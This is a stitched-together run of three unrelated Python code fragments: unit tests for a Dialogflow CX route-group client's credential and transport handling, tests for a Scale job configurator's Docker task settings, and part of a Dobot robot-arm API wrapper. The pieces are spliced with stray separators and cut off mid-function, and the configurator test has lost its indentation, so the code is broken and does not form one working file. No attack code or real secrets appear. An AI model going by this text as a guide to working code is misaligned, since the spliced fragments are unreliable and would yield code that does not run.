        response = await client.delete_transition_route_group(name="name_value",)

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        arg = args[0].name
        mock_val = "name_value"
        assert arg == mock_val
@pytest.mark.asyncio
async def test_delete_transition_route_group_flattened_error_async():
    """Mixing a request object with flattened fields must raise (async client)."""
    client = TransitionRouteGroupsAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # A request object and flattened fields are mutually exclusive inputs.
    request = transition_route_group.DeleteTransitionRouteGroupRequest()
    with pytest.raises(ValueError):
        await client.delete_transition_route_group(request, name="name_value")
def test_credentials_transport_error():
    """Mutually exclusive client-construction arguments must raise ValueError.

    Fixes: dropped the unused ``client =`` bindings — the constructor raises
    inside ``pytest.raises`` so the assignment never completed anyway.
    """
    # It is an error to provide credentials and a transport instance.
    transport = transports.TransitionRouteGroupsGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    with pytest.raises(ValueError):
        TransitionRouteGroupsClient(
            credentials=ga_credentials.AnonymousCredentials(), transport=transport,
        )
    # It is an error to provide a credentials file and a transport instance.
    transport = transports.TransitionRouteGroupsGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    with pytest.raises(ValueError):
        TransitionRouteGroupsClient(
            client_options={"credentials_file": "credentials.json"},
            transport=transport,
        )
    # It is an error to provide an api_key and a transport instance.
    transport = transports.TransitionRouteGroupsGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    options = client_options.ClientOptions()
    options.api_key = "api_key"
    with pytest.raises(ValueError):
        TransitionRouteGroupsClient(
            client_options=options, transport=transport,
        )
    # It is an error to provide an api_key and a credential.
    options = mock.Mock()
    options.api_key = "api_key"
    with pytest.raises(ValueError):
        TransitionRouteGroupsClient(
            client_options=options, credentials=ga_credentials.AnonymousCredentials()
        )
    # It is an error to provide scopes and a transport instance.
    transport = transports.TransitionRouteGroupsGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    with pytest.raises(ValueError):
        TransitionRouteGroupsClient(
            client_options={"scopes": ["1", "2"]}, transport=transport,
        )
def test_transport_instance():
    """A client built around an explicit transport keeps that exact instance."""
    custom_transport = transports.TransitionRouteGroupsGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    client = TransitionRouteGroupsClient(transport=custom_transport)
    # Identity, not equality: the very same object must be reused.
    assert client.transport is custom_transport
def test_transport_get_channel():
    """Both gRPC transport flavours expose their underlying channel."""
    for transport_cls in (
        transports.TransitionRouteGroupsGrpcTransport,
        transports.TransitionRouteGroupsGrpcAsyncIOTransport,
    ):
        transport = transport_cls(
            credentials=ga_credentials.AnonymousCredentials(),
        )
        # The lazily-created channel must be truthy (i.e. actually exist).
        assert transport.grpc_channel
@pytest.mark.parametrize(
    "transport_class",
    [
        transports.TransitionRouteGroupsGrpcTransport,
        transports.TransitionRouteGroupsGrpcAsyncIOTransport,
    ],
)
def test_transport_adc(transport_class):
    """Without explicit credentials the transport falls back to ADC."""
    with mock.patch.object(google.auth, "default") as default_creds:
        default_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport_class()
        # Application Default Credentials must have been consulted exactly once.
        default_creds.assert_called_once()
def test_transport_grpc_default():
    """gRPC is the transport used when the caller specifies none."""
    client = TransitionRouteGroupsClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    assert isinstance(
        client.transport, transports.TransitionRouteGroupsGrpcTransport
    )
def test_transition_route_groups_base_transport_error():
    """Providing both credentials and credentials_file must raise.

    Fixes: dropped the dead ``transport =`` binding — the constructor raises
    inside ``pytest.raises`` so the name was never assigned.
    """
    with pytest.raises(core_exceptions.DuplicateCredentialArgs):
        transports.TransitionRouteGroupsTransport(
            credentials=ga_credentials.AnonymousCredentials(),
            credentials_file="credentials.json",
        )
def test_transition_route_groups_base_transport():
    """Every abstract RPC on the base transport raises NotImplementedError."""
    # Neutralize __init__ so the abstract transport can be instantiated at all.
    with mock.patch(
        "google.cloud.dialogflowcx_v3beta1.services.transition_route_groups.transports.TransitionRouteGroupsTransport.__init__"
    ) as init_mock:
        init_mock.return_value = None
        transport = transports.TransitionRouteGroupsTransport(
            credentials=ga_credentials.AnonymousCredentials(),
        )
        # Each service method must refuse to run on the abstract base.
        for method in (
            "list_transition_route_groups",
            "get_transition_route_group",
            "create_transition_route_group",
            "update_transition_route_group",
            "delete_transition_route_group",
        ):
            with pytest.raises(NotImplementedError):
                getattr(transport, method)(request=object())
        # close() is abstract as well.
        with pytest.raises(NotImplementedError):
            transport.close()
def test_transition_route_groups_base_transport_with_credentials_file():
    """A credentials file is loaded with the service's default scopes."""
    with mock.patch.object(
        google.auth, "load_credentials_from_file", autospec=True
    ) as load_creds, mock.patch(
        "google.cloud.dialogflowcx_v3beta1.services.transition_route_groups.transports.TransitionRouteGroupsTransport._prep_wrapped_messages"
    ) as prep_mock:
        prep_mock.return_value = None
        load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
        # Constructing the transport should route through load_credentials_from_file.
        transports.TransitionRouteGroupsTransport(
            credentials_file="credentials.json", quota_project_id="octopus",
        )
        load_creds.assert_called_once_with(
            "credentials.json",
            scopes=None,
            default_scopes=(
                "https://www.googleapis.com/auth/cloud-platform",
                "https://www.googleapis.com/auth/dialogflow",
            ),
            quota_project_id="octopus",
        )
def test_transition_route_groups_base_transport_with_adc():
    """ADC supplies credentials when neither credentials nor a file is given."""
    with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch(
        "google.cloud.dialogflowcx_v3beta1.services.transition_route_groups.transports.TransitionRouteGroupsTransport._prep_wrapped_messages"
    ) as prep_mock:
        prep_mock.return_value = None
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        transports.TransitionRouteGroupsTransport()
        adc.assert_called_once()
def test_transition_route_groups_auth_adc():
    """The client requests ADC with the service's default scopes."""
    with mock.patch.object(google.auth, "default", autospec=True) as adc:
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        TransitionRouteGroupsClient()
        # The default-credentials lookup must carry the Dialogflow scopes.
        adc.assert_called_once_with(
            scopes=None,
            default_scopes=(
                "https://www.googleapis.com/auth/cloud-platform",
                "https://www.googleapis.com/auth/dialogflow",
            ),
            quota_project_id=None,
        )
@pytest.mark.parametrize(
    "transport_class",
    [
        transports.TransitionRouteGroupsGrpcTransport,
        transports.TransitionRouteGroupsGrpcAsyncIOTransport,
    ],
)
def test_transition_route_groups_transport_auth_adc(transport_class):
    """Transports forward explicit scopes and quota project to ADC."""
    with mock.patch.object(google.auth, "default", autospec=True) as default_auth:
        default_auth.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport_class(quota_project_id="octopus", scopes=["1", "2"])
        default_auth.assert_called_once_with(
            scopes=["1", "2"],
            default_scopes=(
                "https://www.googleapis.com/auth/cloud-platform",
                "https://www.googleapis.com/auth/dialogflow",
            ),
            quota_project_id="octopus",
        )
@pytest.mark.parametrize(
    "transport_class,grpc_helpers",
    [
        (transports.TransitionRouteGroupsGrpcTransport, grpc_helpers),
        (transports.TransitionRouteGroupsGrpcAsyncIOTransport, grpc_helpers_async),
    ],
)
def test_transition_route_groups_transport_create_channel(
    transport_class, grpc_helpers
):
    """Channel creation receives ADC credentials and the expected gRPC options."""
    with mock.patch.object(
        google.auth, "default", autospec=True
    ) as default_auth, mock.patch.object(
        grpc_helpers, "create_channel", autospec=True
    ) as channel_factory:
        creds = ga_credentials.AnonymousCredentials()
        default_auth.return_value = (creds, None)
        transport_class(quota_project_id="octopus", scopes=["1", "2"])
        # The channel must be created against the service host with the ADC
        # credentials and both message-size limits lifted.
        channel_factory.assert_called_with(
            "dialogflow.googleapis.com:443",
            credentials=creds,
            credentials_file=None,
            quota_project_id="octopus",
            default_scopes=(
                "https://www.googleapis.com/auth/cloud-platform",
                "https://www.googleapis.com/auth/dialogflow",
            ),
            scopes=["1", "2"],
            default_host="dialogflow.googleapis.com",
            ssl_credentials=None,
            options=[
                ("grpc.max_send_message_length", -1),
                ("grpc.max_receive_message_length", -1),
            ],
        )
@pytest.mark.parametrize(
    "transport_class",
    [
        transports.TransitionRouteGroupsGrpcTransport,
        transports.TransitionRouteGroupsGrpcAsyncIOTransport,
    ],
)
def test_transition_route_groups_grpc_transport_client_cert_source_for_mtls(
    transport_class,
):
    """mTLS credentials come from ssl_channel_credentials or the cert-source callback."""
    cred = ga_credentials.AnonymousCredentials()
    # Case 1: an explicit ssl_channel_credentials object is passed straight through.
    with mock.patch.object(transport_class, "create_channel") as channel_factory:
        ssl_creds = mock.Mock()
        transport_class(
            host="squid.clam.whelk",
            credentials=cred,
            ssl_channel_credentials=ssl_creds,
        )
        channel_factory.assert_called_once_with(
            "squid.clam.whelk:443",
            credentials=cred,
            credentials_file=None,
            scopes=None,
            ssl_credentials=ssl_creds,
            quota_project_id=None,
            options=[
                ("grpc.max_send_message_length", -1),
                ("grpc.max_receive_message_length", -1),
            ],
        )
    # Case 2: without ssl_channel_credentials, the client_cert_source_for_mtls
    # callback supplies the certificate pair used to build the SSL credentials.
    with mock.patch.object(transport_class, "create_channel", return_value=mock.Mock()):
        with mock.patch("grpc.ssl_channel_credentials") as ssl_cred_factory:
            transport_class(
                credentials=cred,
                client_cert_source_for_mtls=client_cert_source_callback,
            )
            expected_cert, expected_key = client_cert_source_callback()
            ssl_cred_factory.assert_called_once_with(
                certificate_chain=expected_cert, private_key=expected_key
            )
def test_transition_route_groups_host_no_port():
    """An endpoint given without a port gets the default :443 appended."""
    options = client_options.ClientOptions(api_endpoint="dialogflow.googleapis.com")
    client = TransitionRouteGroupsClient(
        credentials=ga_credentials.AnonymousCredentials(), client_options=options,
    )
    assert client.transport._host == "dialogflow.googleapis.com:443"
def test_transition_route_groups_host_with_port():
    """An endpoint that already carries a port keeps that port."""
    options = client_options.ClientOptions(api_endpoint="dialogflow.googleapis.com:8000")
    client = TransitionRouteGroupsClient(
        credentials=ga_credentials.AnonymousCredentials(), client_options=options,
    )
    assert client.transport._host == "dialogflow.googleapis.com:8000"
def test_transition_route_groups_grpc_transport_channel():
    """A caller-supplied channel is used verbatim by the sync transport.

    Fixes: ``== None`` replaced with the idiomatic identity test ``is None``.
    """
    channel = grpc.secure_channel("http://localhost/", grpc.local_channel_credentials())
    # Check that channel is used if provided.
    transport = transports.TransitionRouteGroupsGrpcTransport(
        host="squid.clam.whelk", channel=channel,
    )
    assert transport.grpc_channel == channel
    assert transport._host == "squid.clam.whelk:443"
    assert transport._ssl_channel_credentials is None
def test_transition_route_groups_grpc_asyncio_transport_channel():
channel = aio.secure_channel("http://localhost/", grpc.local_channel_credentials())
# Check that channel is used if | |
job.get_resources()
# Get job info off of the queue
queue = Queue.objects.get(job_id=job.id)
queued_job_exe = QueuedJobExecution(queue)
queued_job_exe.scheduled('agent_1', node.id, resources)
job_exe_model = queued_job_exe.create_job_exe_model(framework_id, now())
# Test method
with patch('job.execution.configuration.configurators.settings') as mock_settings:
with patch('job.execution.configuration.configurators.secrets_mgr') as mock_secrets_mgr:
mock_settings.LOGGING_ADDRESS = 'test-logging-address'
mock_settings.DATABASES = {'default': {'NAME': 'TEST_NAME', 'USER': 'TEST_USER',
'PASSWORD': '<PASSWORD>', 'HOST': 'TEST_HOST',
'PORT': 'TEST_PORT'}}
mock_settings.BROKER_URL = 'mock://broker-url'
mock_settings.QUEUE_NAME = ''
mock_secrets_mgr.retrieve_job_type_secrets = MagicMock()
mock_secrets_mgr.retrieve_job_type_secrets.return_value = {}
configurator = ScheduledExecutionConfigurator({})
exe_config_with_secrets = configurator.configure_scheduled_job(job_exe_model, job_type,
queue.get_job_interface(), 'INFO')
# Ensure configuration is valid
ExecutionConfiguration(exe_config_with_secrets.get_dict())
# Check config for logging parameters
for task_type in exe_config_with_secrets.get_task_types():
if task_type == 'pull':
continue # Ignore pull tasks which are not Docker tasks
found_log_driver = False
found_syslog_format = False
found_syslog_address = False
found_tag = False
for docker_param in exe_config_with_secrets.get_docker_params(task_type):
if docker_param.flag == 'log-driver':
self.assertEqual(docker_param.value, 'syslog')
found_log_driver = True
elif docker_param.flag == 'log-opt':
array = docker_param.value.split('=')
opt_name = array[0]
opt_value = array[1]
if opt_name == 'syslog-format':
self.assertEqual(opt_value, 'rfc3164')
found_syslog_format = True
elif opt_name == 'syslog-address':
self.assertEqual(opt_value, 'test-logging-address')
found_syslog_address = True
elif opt_name == 'tag':
tag_value = '%s|%s' % (exe_config_with_secrets.get_task_id(task_type), job_type.name)
self.assertEqual(opt_value, tag_value)
found_tag = True
self.assertTrue(found_log_driver)
self.assertTrue(found_syslog_format)
self.assertTrue(found_syslog_address)
self.assertTrue(found_tag)
def test_configure_scheduled_job_regular(self):
"""Tests successfully calling configure_scheduled_job() on a regular (non-system) job"""
framework_id = '1234'
node = node_test_utils.create_node()
broker_dict = {'version': '1.0', 'broker': {'type': 'host', 'host_path': '/w_1/host/path'}}
input_workspace = storage_test_utils.create_workspace(json_config=broker_dict)
broker_dict = {'version': '1.0', 'broker': {'type': 's3', 'bucket_name': 'bucket1',
'host_path': '/w_2/host/path', 'region_name': 'us-east-1'}}
output_workspace = storage_test_utils.create_workspace(json_config=broker_dict)
workspaces = {input_workspace.name: input_workspace, output_workspace.name: output_workspace}
file_1 = storage_test_utils.create_file(workspace=input_workspace)
file_2 = storage_test_utils.create_file(workspace=input_workspace)
file_3 = storage_test_utils.create_file(workspace=input_workspace)
interface_dict = {'version': '1.4', 'command': 'foo',
'command_arguments': '${-a :input_1} ${-b :input_2} ${input_3} ${s_1} ${job_output_dir}',
'env_vars': [{'name': 'my_special_env', 'value': '${s_2}'}],
'mounts': [{'name': 'm_1', 'path': '/the/cont/path', 'mode': 'ro'},
{'name': 'm_2', 'path': '/the/missing/cont/path', 'mode': 'rw'},
{'name': 'm_3', 'path': '/the/optional/cont/path', 'mode': 'rw',
'required': False}],
'settings': [{'name': 's_1'}, {'name': 's_2', 'secret': True}, {'name': 's_3'},
{'name': 's_4', 'required': False}],
'input_data': [{'name': 'input_1', 'type': 'property'}, {'name': 'input_2', 'type': 'file'},
{'name': 'input_3', 'type': 'files'}],
'output_data': [{'name': 'output_1', 'type': 'file'}]}
data_dict = {'input_data': [{'name': 'input_1', 'value': 'my_val'}, {'name': 'input_2', 'file_id': file_1.id},
{'name': 'input_3', 'file_ids': [file_2.id, file_3.id]}],
'output_data': [{'name': 'output_1', 'workspace_id': output_workspace.id}]}
job_type_config_dict = {'version': '2.0', 'settings': {'s_1': 's_1_value'},
'mounts': {'m_1': {'type': 'host', 'host_path': '/m_1/host_path'}}}
job_type = job_test_utils.create_job_type(interface=interface_dict, configuration=job_type_config_dict)
from queue.job_exe import QueuedJobExecution
from queue.models import Queue
job = Queue.objects.queue_new_job(job_type, JobData(data_dict), trigger_test_utils.create_trigger_event())
resources = job.get_resources()
main_resources = resources.copy()
main_resources.subtract(NodeResources([Disk(job.input_file_size)]))
post_resources = resources.copy()
post_resources.remove_resource('disk')
# Get job info off of the queue
queue = Queue.objects.get(job_id=job.id)
# Add recipe and batch info to queue model
batch = batch_test_utils.create_batch()
recipe = recipe_test_utils.create_recipe()
queue.batch_id = batch.id
queue.recipe_id = recipe.id
queue.save()
queued_job_exe = QueuedJobExecution(queue)
queued_job_exe.scheduled('agent_1', node.id, resources)
job_exe_model = queued_job_exe.create_job_exe_model(framework_id, now())
# Test method
with patch('job.execution.configuration.configurators.settings') as mock_settings:
with patch('job.execution.configuration.configurators.secrets_mgr') as mock_secrets_mgr:
mock_settings.LOGGING_ADDRESS = None # Ignore logging settings, there's enough in this unit test
mock_settings.DATABASES = {'default': {'NAME': 'TEST_NAME', 'USER': 'TEST_USER',
'PASSWORD': '<PASSWORD>', 'HOST': 'TEST_HOST',
'PORT': 'TEST_PORT'}}
mock_settings.BROKER_URL = 'mock://broker-url'
mock_settings.QUEUE_NAME = ''
mock_secrets_mgr.retrieve_job_type_secrets = MagicMock()
mock_secrets_mgr.retrieve_job_type_secrets.return_value = {'s_2': 's_2_secret'}
configurator = ScheduledExecutionConfigurator(workspaces)
exe_config_with_secrets = configurator.configure_scheduled_job(job_exe_model, job_type,
queue.get_job_interface(), 'INFO')
# Expected results
input_wksp_vol_name = get_workspace_volume_name(job_exe_model, input_workspace.name)
input_wksp_vol_path = get_workspace_volume_path(input_workspace.name)
output_wksp_vol_name = get_workspace_volume_name(job_exe_model, output_workspace.name)
output_wksp_vol_path = get_workspace_volume_path(output_workspace.name)
m_1_vol_name = get_mount_volume_name(job_exe_model, 'm_1')
input_mnt_name = 'scale_input_mount'
output_mnt_name = 'scale_output_mount'
input_vol_name = get_job_exe_input_vol_name(job_exe_model)
output_vol_name = get_job_exe_output_vol_name(job_exe_model)
input_2_val = os.path.join(SCALE_JOB_EXE_INPUT_PATH, 'input_2', file_1.file_name)
input_3_val = os.path.join(SCALE_JOB_EXE_INPUT_PATH, 'input_3')
expected_input_files = queue.get_execution_configuration().get_dict()['input_files']
expected_output_workspaces = {'output_1': output_workspace.name}
expected_pull_task = {'task_id': '%s_pull' % job_exe_model.get_cluster_id(), 'type': 'pull',
'resources': {'cpus': resources.cpus, 'mem': resources.mem, 'disk': resources.disk},
'args': create_pull_command(job_type.get_tagged_docker_image()),
'env_vars': {'ALLOCATED_CPUS': unicode(resources.cpus),
'ALLOCATED_MEM': unicode(resources.mem),
'ALLOCATED_DISK': unicode(resources.disk),
'SCALE_JOB_ID': unicode(job.id),
'SCALE_EXE_NUM': unicode(job.num_exes),
'SCALE_RECIPE_ID': unicode(recipe.id),
'SCALE_BATCH_ID': unicode(batch.id)
},
'docker_params': [{'flag': 'env', 'value': 'ALLOCATED_MEM=%.1f' % resources.mem},
{'flag': 'env', 'value': 'ALLOCATED_CPUS=%.1f' % resources.cpus},
{'flag': 'env', 'value': 'ALLOCATED_DISK=%.1f' % resources.disk},
{'flag': 'env', 'value': 'SCALE_JOB_ID=%s' % unicode(job.id)},
{'flag': 'env', 'value': 'SCALE_EXE_NUM=%s' % unicode(job.num_exes)},
{'flag': 'env', 'value': 'SCALE_RECIPE_ID=%s' % unicode(recipe.id)},
{'flag': 'env', 'value': 'SCALE_BATCH_ID=%s' % unicode(batch.id)}]}
expected_pre_task = {'task_id': '%s_pre' % job_exe_model.get_cluster_id(), 'type': 'pre',
'resources': {'cpus': resources.cpus, 'mem': resources.mem, 'disk': resources.disk},
'args': PRE_TASK_COMMAND_ARGS,
'env_vars': {'ALLOCATED_CPUS': unicode(resources.cpus),
'ALLOCATED_MEM': unicode(resources.mem),
'ALLOCATED_DISK': unicode(resources.disk), 'SCALE_DB_NAME': 'TEST_NAME',
'SCALE_DB_USER': 'TEST_USER', 'SCALE_DB_PASS': '<PASSWORD>',
'SCALE_DB_HOST': 'TEST_HOST', 'SCALE_DB_PORT': 'TEST_PORT',
'SCALE_JOB_ID': unicode(job.id), 'SCALE_EXE_NUM': unicode(job.num_exes),
'SCALE_RECIPE_ID': unicode(recipe.id), 'SCALE_BATCH_ID': unicode(batch.id),
'SCALE_BROKER_URL': 'mock://broker-url'
},
'workspaces': {input_workspace.name: {'mode': 'ro', 'volume_name': input_wksp_vol_name}},
'mounts': {input_mnt_name: input_vol_name, output_mnt_name: output_vol_name},
'settings': {'SCALE_DB_NAME': 'TEST_NAME', 'SCALE_DB_USER': 'TEST_USER',
'SCALE_DB_PASS': '<PASSWORD>', 'SCALE_DB_HOST': 'TEST_HOST',
'SCALE_DB_PORT': 'TEST_PORT', 'SCALE_BROKER_URL': 'mock://broker-url'},
'volumes': {input_wksp_vol_name: {'container_path': input_wksp_vol_path, 'mode': 'ro',
'type': 'host', 'host_path': '/w_1/host/path'},
input_vol_name: {'container_path': SCALE_JOB_EXE_INPUT_PATH, 'mode': 'rw',
'type': 'volume'},
output_vol_name: {'container_path': SCALE_JOB_EXE_OUTPUT_PATH, 'mode': 'rw',
'type': 'volume'}},
'docker_params': [{'flag': 'env', 'value': 'SCALE_BROKER_URL=mock://broker-url'},
{'flag': 'env', 'value': 'SCALE_DB_USER=TEST_USER'},
{'flag': 'env', 'value': 'SCALE_DB_NAME=TEST_NAME'},
{'flag': 'env', 'value': 'ALLOCATED_MEM=%.1f' % resources.mem},
{'flag': 'env', 'value': 'ALLOCATED_CPUS=%.1f' % resources.cpus},
{'flag': 'env', 'value': 'SCALE_DB_HOST=TEST_HOST'},
{'flag': 'env', 'value': 'ALLOCATED_DISK=%.1f' % resources.disk},
{'flag': 'env', 'value': 'SCALE_DB_PASS=<PASSWORD>'},
{'flag': 'env', 'value': 'SCALE_DB_PORT=TEST_PORT'},
{'flag': 'env', 'value': 'SCALE_JOB_ID=%s' % unicode(job.id)},
{'flag': 'env', 'value': 'SCALE_EXE_NUM=%s' % unicode(job.num_exes)},
{'flag': 'env', 'value': 'SCALE_RECIPE_ID=%s' % unicode(recipe.id)},
{'flag': 'env', 'value': 'SCALE_BATCH_ID=%s' % unicode(batch.id)},
{'flag': 'volume', 'value': '%s:%s:rw' %
(output_vol_name, SCALE_JOB_EXE_OUTPUT_PATH)},
{'flag': 'volume',
'value': '/w_1/host/path:%s:ro' % input_wksp_vol_path},
{'flag': 'volume', 'value': '%s:%s:rw' %
(input_vol_name, SCALE_JOB_EXE_INPUT_PATH)}
]}
expected_pst_task = {'task_id': '%s_post' % job_exe_model.get_cluster_id(), 'type': 'post',
'resources': {'cpus': post_resources.cpus, 'mem': post_resources.mem,
'disk': post_resources.disk},
'args': POST_TASK_COMMAND_ARGS,
'env_vars': {'ALLOCATED_CPUS': unicode(post_resources.cpus),
'ALLOCATED_MEM': unicode(post_resources.mem),
'ALLOCATED_DISK': unicode(post_resources.disk), 'SCALE_DB_NAME': 'TEST_NAME',
'SCALE_DB_USER': 'TEST_USER', 'SCALE_DB_PASS': '<PASSWORD>',
'SCALE_DB_HOST': 'TEST_HOST', 'SCALE_DB_PORT': 'TEST_PORT',
'SCALE_JOB_ID': unicode(job.id), 'SCALE_EXE_NUM': unicode(job.num_exes),
'SCALE_RECIPE_ID': unicode(recipe.id), 'SCALE_BATCH_ID': unicode(batch.id),
'SCALE_BROKER_URL': 'mock://broker-url'
},
'workspaces': {input_workspace.name: {'mode': 'rw', 'volume_name': input_wksp_vol_name},
output_workspace.name: {'mode': 'rw', 'volume_name': output_wksp_vol_name}},
'mounts': {output_mnt_name: output_vol_name},
'settings': {'SCALE_DB_NAME': 'TEST_NAME', 'SCALE_DB_USER': 'TEST_USER',
'SCALE_DB_PASS': '<PASSWORD>', 'SCALE_DB_HOST': 'TEST_HOST',
'SCALE_DB_PORT': 'TEST_PORT', 'SCALE_BROKER_URL': 'mock://broker-url'},
'volumes': {input_wksp_vol_name: {'container_path': input_wksp_vol_path, 'mode': 'rw',
'type': 'host', 'host_path': '/w_1/host/path'},
output_wksp_vol_name: {'container_path': output_wksp_vol_path, 'mode': 'rw',
'type': 'host', 'host_path': '/w_2/host/path'},
output_vol_name: {'container_path': SCALE_JOB_EXE_OUTPUT_PATH, 'mode': 'ro',
'type': 'volume'}},
'docker_params': [{'flag': 'env', 'value': 'SCALE_BROKER_URL=mock://broker-url'},
{'flag': 'env', 'value': 'SCALE_DB_USER=TEST_USER'},
{'flag': 'env', 'value': 'SCALE_DB_NAME=TEST_NAME'},
{'flag': 'env', 'value': 'SCALE_JOB_ID=%d' % job.id},
{'flag': 'env', 'value': 'SCALE_EXE_NUM=%d' % job.num_exes},
{'flag': 'env', 'value': 'ALLOCATED_MEM=%.1f' % post_resources.mem},
{'flag': 'env', 'value': 'ALLOCATED_CPUS=%.1f' % post_resources.cpus},
{'flag': 'env', 'value': 'SCALE_DB_HOST=TEST_HOST'},
{'flag': 'env', 'value': 'ALLOCATED_DISK=%.1f' % post_resources.disk},
{'flag': 'env', 'value': 'SCALE_DB_PASS=<PASSWORD>'},
{'flag': 'env', 'value': 'SCALE_DB_PORT=TEST_PORT'},
{'flag': 'env', 'value': 'SCALE_JOB_ID=%s' % unicode(job.id)},
{'flag': 'env', 'value': 'SCALE_EXE_NUM=%s' % unicode(job.num_exes)},
{'flag': 'env', 'value': 'SCALE_RECIPE_ID=%s' % unicode(recipe.id)},
{'flag': 'env', 'value': 'SCALE_BATCH_ID=%s' % unicode(batch.id)},
{'flag': 'volume', 'value': '%s:%s:ro' %
(output_vol_name, SCALE_JOB_EXE_OUTPUT_PATH)},
{'flag': 'volume',
'value': '/w_1/host/path:%s:rw' % input_wksp_vol_path},
{'flag': 'volume',
'value': '/w_2/host/path:%s:rw' % output_wksp_vol_path}
]}
expected_main_task = {'task_id': '%s_main' % job_exe_model.get_cluster_id(), 'type': 'main',
'resources': {'cpus': main_resources.cpus, 'mem': main_resources.mem,
'disk': main_resources.disk},
'args': '-a my_val -b %s %s s_1_value %s' %
(input_2_val, input_3_val, SCALE_JOB_EXE_OUTPUT_PATH),
'env_vars': {'INPUT_1': 'my_val', 'INPUT_2': input_2_val, 'INPUT_3': input_3_val,
'job_output_dir': SCALE_JOB_EXE_OUTPUT_PATH,
'OUTPUT_DIR': SCALE_JOB_EXE_OUTPUT_PATH, 'S_1': 's_1_value',
'S_2': 's_2_secret', 'my_special_env': 's_2_secret',
'ALLOCATED_CPUS': unicode(main_resources.cpus),
'ALLOCATED_MEM': unicode(main_resources.mem),
'ALLOCATED_DISK': unicode(main_resources.disk),
'SCALE_JOB_ID': unicode(job.id), 'SCALE_EXE_NUM': unicode(job.num_exes),
'SCALE_RECIPE_ID': unicode(recipe.id), 'SCALE_BATCH_ID': unicode(batch.id)
},
'workspaces': {input_workspace.name: {'mode': 'ro', 'volume_name': input_wksp_vol_name}},
'mounts': {'m_1': m_1_vol_name, 'm_2': None, 'm_3': None, input_mnt_name: input_vol_name,
output_mnt_name: output_vol_name}, # m_2 and s_3 are required, but missing
'settings': {'s_1': 's_1_value', 's_2': 's_2_secret', 's_3': None},
'volumes': {input_wksp_vol_name: {'container_path': input_wksp_vol_path, 'mode': 'ro',
'type': 'host', 'host_path': '/w_1/host/path'},
input_vol_name: {'container_path': SCALE_JOB_EXE_INPUT_PATH, 'mode': 'ro',
'type': 'volume'},
output_vol_name: {'container_path': SCALE_JOB_EXE_OUTPUT_PATH, 'mode': 'rw',
'type': 'volume'},
m_1_vol_name: {'container_path': '/the/cont/path', 'mode': 'ro',
'type': 'host', 'host_path': '/m_1/host_path'}},
'docker_params': [{'flag': 'env', 'value': 'S_1=s_1_value'},
{'flag': 'env', 'value': 'S_2=s_2_secret'},
{'flag': 'env', 'value': 'ALLOCATED_MEM=%.1f' % main_resources.mem},
{'flag': 'env', 'value': 'ALLOCATED_CPUS=%.1f' % main_resources.cpus},
{'flag': 'env', 'value': 'my_special_env=s_2_secret'},
{'flag': 'env', 'value': 'ALLOCATED_DISK=%.1f' % main_resources.disk},
{'flag': 'env', 'value': 'INPUT_2=%s' % input_2_val},
{'flag': 'env', 'value': 'INPUT_3=%s' % input_3_val},
{'flag': 'env', 'value': 'INPUT_1=my_val'},
{'flag': 'env', 'value': 'job_output_dir=%s' % SCALE_JOB_EXE_OUTPUT_PATH},
{'flag': 'env', 'value': 'OUTPUT_DIR=%s' % SCALE_JOB_EXE_OUTPUT_PATH},
{'flag': 'env', 'value': 'SCALE_JOB_ID=%s' % unicode(job.id)},
{'flag': 'env', 'value': 'SCALE_EXE_NUM=%s' % unicode(job.num_exes)},
{'flag': 'env', 'value': 'SCALE_RECIPE_ID=%s' % unicode(recipe.id)},
{'flag': 'env', 'value': 'SCALE_BATCH_ID=%s' % unicode(batch.id)},
{'flag': 'volume', 'value': '%s:%s:rw' %
(output_vol_name, SCALE_JOB_EXE_OUTPUT_PATH)},
{'flag': 'volume',
'value': '/m_1/host_path:/the/cont/path:ro'},
{'flag': 'volume',
'value': '/w_1/host/path:%s:ro' % input_wksp_vol_path},
{'flag': 'volume', 'value': '%s:%s:ro' %
(input_vol_name, SCALE_JOB_EXE_INPUT_PATH)}
]}
expected_config = {'version': '2.0',
'input_files': expected_input_files,
'output_workspaces': expected_output_workspaces,
'tasks': [expected_pull_task, expected_pre_task, expected_main_task, expected_pst_task]}
# Ensure configuration is valid
ExecutionConfiguration(exe_config_with_secrets.get_dict())
# Compare results including secrets, but convert Docker param lists to sets so order is ignored
config_with_secrets_dict = exe_config_with_secrets.get_dict()
for task_dict in config_with_secrets_dict['tasks']:
docker_params_set = set()
for docker_param in task_dict['docker_params']:
docker_params_set.add('%s=%s' % (docker_param['flag'], docker_param['value']))
task_dict['docker_params'] = docker_params_set
for task_dict in expected_config['tasks']:
docker_params_set = set()
for docker_param in task_dict['docker_params']:
docker_params_set.add('%s=%s' % (docker_param['flag'], docker_param['value']))
task_dict['docker_params'] = docker_params_set
self.maxDiff | |
SetEMotorS(api, index, isEnabled, speed, distance, isQueued=0):
emotorS = EMotorS()
emotorS.index = index
emotorS.isEnabled = isEnabled
emotorS.speed = speed
emotorS.distance = distance
queuedCmdIndex = c_uint64(0)
if slaveDevType == DevType.Magician:
tempSlaveId = slaveId
elif masterDevType == DevType.Conntroller and (slaveDevType == DevType.MagicianLite or slaveDevType == DevType.Idle):
tempSlaveId = -1
else:
tempSlaveId = slaveId
while(True):
result = api.SetEMotorS(c_int(masterId), c_int(tempSlaveId), byref(emotorS), isQueued, byref(queuedCmdIndex))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
return [queuedCmdIndex.value]
def GetIOADC(api, addr):
    """Read the ADC value of I/O address *addr*; blocks, retrying, until the read succeeds."""
    param = IOADC()
    param.address = addr
    # A Controller master driving a MagicianLite (or an idle port) addresses
    # the slave as -1; every other combination uses the configured slaveId.
    if masterDevType == DevType.Conntroller and slaveDevType in (DevType.MagicianLite, DevType.Idle):
        tempSlaveId = -1
